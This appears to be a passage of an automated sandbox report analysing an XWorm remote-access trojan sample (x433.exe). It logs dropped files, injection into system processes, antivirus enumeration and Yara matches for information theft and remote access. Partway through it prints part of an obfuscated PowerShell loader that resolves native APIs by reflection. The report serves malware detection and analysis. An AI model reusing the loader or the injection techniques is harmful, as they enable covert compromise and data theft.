Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: C00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2CA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2870000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2BB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 11D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1170000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 10A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1420000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 13E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: ED0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1220000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: DC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1020000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 28C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 23F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18DFB160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE4A0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5360000
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe"
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:rlleiafhazae{param([outputtype([type])][parameter(position=0)][type[]]$osygfxruyuiqnc,[parameter(position=1)][type]$mbvadjewai)$relcklizwns=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+[char](100)+''+'d'+'e'+[char](108)+''+'e'+''+[char](103)+'a'+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+'e'+[char](109)+''+[char](111)+''+[char](114)+'y'+'m'+'o'+[char](100)+''+[char](117)+'l'+'e'+'',$false).definetype('my'+'d'+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'ate'+[char](84)+''+'y'+'p'+[char](101)+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+'s'+','+''+[char](80)+''+'u'+'bl'+'i'+''+[char](99)+''+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+''+[char](101)+''+'d'+','+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+[char](67)+'la'+[char](115)+''+'s'+','+[char](65)+''+'u'+''+[char](116)+''+'o'+''+[char](67)+''+[char](108)+'a'+[char](115)+'s',[multicastdelegate]);$relcklizwns.defineconstructor(''+[char](82)+''+'t'+'s'+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+''+[char](97)+'l'+[char](78)+''+'a'+''+[char](109)+'e'+[char](44)+''+[char](72)+''+'i'+'debys'+'i'+''+'g'+''+[char](44)+''+'p'+''+'u'+''+'b'+''+'l'+''+[char](105)+'c',[reflection.callingconventions]::standard,$osygfxruyuiqnc).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+',m'+[char](97)+''+'n'+''+[char](97)+''+'g'+''+'e'+''+'d'+'');$relcklizwns.definemethod(''+[char](73)+''+[char](110)+'v'+'o'+''+'k'+''+[char](101)+'',''+[char](80)+''+'u'+'b'+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+'deb'+'y'+''+'s'+'i'+[char](1
03)+','+'n'+'ew'+[char](83)+''+[char](108)+'o'+[char](116)+''+','+'vi'+[char](114)+'t'+[char](117)+''+[char](97)+''+'l'+'',$mbvadjewai,$osygfxruyuiqnc).setimplementationflags(''+'r'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[char](44)+''+'m'+''+[char](97)+''+'n'+''+[char](97)+'g'+[char](101)+''+'d'+'');write-output $relcklizwns.createtype();}$ggvrsjgyyzyvf=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sy'+[char](115)+''+[char](116)+''+'e'+'m.'+[char](100)+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t.wi'+[char](110)+'32.'+'u'+''+[char](110)+''+'s'+'a'+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+''+'m'+'eth'+'o'+''+[char](100)+''+'s'+'');$vrbfksfcqktmpl=$ggvrsjgyyzyvf.getmethod(''+'g'+''+[char](101)+'tpr'+[char](111)+''+[char](99)+''+[char](65)+''+[char](100)+'d'+[char](114)+''+[char](101)+'s'+'s'+''
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 5_2_0000000140002300
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 1_2_00788550
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2y
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A44040 cpuid 5_3_000002D8B0A44040
Source: C:\Users\user\Desktop\x433.exe Queries volume information: C:\Users\user\Desktop\x433.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Queries volume information: C:\Users\user\AppData\Local\Temp\x4host.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\x4usb.exe Queries volume information: C:\Users\user\AppData\Local\x4usb.exe VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 5_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A67D50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_000002D8B0A67D50
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 1_2_00788550
Source: C:\Users\user\Desktop\x433.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: x4host.exe, 00000002.00000002.2937932560.0000000001407000.00000004.00000020.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.3000681433.000000001C0D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.16.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Local\Temp\x4host.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x433.exe PID: 6576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x4host.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x433.exe PID: 6576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x4host.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED